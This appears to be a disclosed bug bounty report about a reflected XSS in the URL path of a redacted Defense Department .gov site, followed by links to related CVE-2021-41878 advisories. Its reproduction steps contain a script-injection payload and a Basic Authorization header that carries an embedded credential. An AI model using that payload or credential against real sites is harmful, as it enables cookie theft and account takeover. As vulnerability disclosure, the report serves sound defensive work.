Lucene search
NotajaxH1:1825942HistoryJan 08, 2023 - 6:35 a.m.
U.S. Dept Of Defense: XSS on ( █████████.gov ) Via URL path
2023-01-0806:35:55
notajax
hackerone.com
42
dept of defense
xss
url path
burp intercepter
headers
authorization
x-experience-api-version
account takeover
video poc
mitigation
inputs
cve-2021-41878
bug bounty
EPSS
0.015
Percentile
87.4%
Hi team,
I was able to execute XSS on ███████.gov
Steps to produce -
1 -Turn on the burp intercepter
2- Go to https://██████.gov/xapi/statements?file"><script>alert(document.domain)</script>
3- In Intercepter add the following Headers
Authorization: Basic eGFwaS10b29sczp4YXBpLXRvb2xz
X-Experience-Api-Version: 1.0.1
4- when you send this GET request you will receive a response with XSS payload executed.
Impact
An attacker can send the malicious link to victims and steals victims’ cookie leading to account takeover.
System Host(s)
Affected Product(s) and Version(s)
CVE Numbers
CVE-2021-41878
Steps to Reproduce
I have attached the Video POC, please check it out.
Suggested Mitigation/Remediation Actions
sanitize the inputs in the URL
Related
cvelist
cvelist
CVE-2021-41878
2021-10-04 11:58:51
exploitdb
exploitdb
i-Panel Administration System 2.0 - Reflected Cross-site Scripting (XSS)
2021-10-15 00:00:00
ibm
ibm
prion
prion
Cross site scripting
2021-10-04 12:15:00
nvd
nvd
CVE-2021-41878
2021-10-04 12:15:09
cve
cve
CVE-2021-41878
2021-10-04 12:15:09
nuclei
nuclei
i-Panel Administration System 2.0 - Cross-Site Scripting
2021-10-06 08:22:02
packetstorm
packetstorm
i-Panel Administration System 2.0 Cross Site Scripting
2021-10-15 00:00:00
zdt
zdt